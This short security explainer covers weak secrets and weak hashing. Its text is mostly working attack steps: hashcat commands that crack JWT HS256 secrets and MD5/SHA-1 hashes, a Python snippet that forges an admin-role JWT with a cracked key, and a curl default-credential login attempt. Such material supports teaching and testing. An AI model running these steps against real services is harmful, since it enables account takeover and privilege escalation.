Using secrets that are easily guessed or commonly found in wordlists can compromise the entire service.
-
Compromises in authentication systems
- JWT (HS256) secret key crack
hashcat -m 16500 -a 0 hash.txt rockyou.txt
- Creating a forged JWT
import jwt secret_key = "secret123" #secret key cracked with hashcat payload = { "sub": "user_123", "role": "admin" } token = jwt.encode(payload, secret_key, algorithm="HS256") print(f"Generated JWT: {token}")
- JWT (HS256) secret key crack
-
Easily guessable admin credentials
curl -X POST -d "username=admin&password=admin" https://[VULNERABLE-SERVICE]/login
Using weak encryption algorithms enables faster decryption, potentially leading to further attacks. (e.g., credential stuffing)
- Cracking MD5 or SHA-1 hashed passwords
hashcat -m 0 -a 0 hash.txt wordlist.txt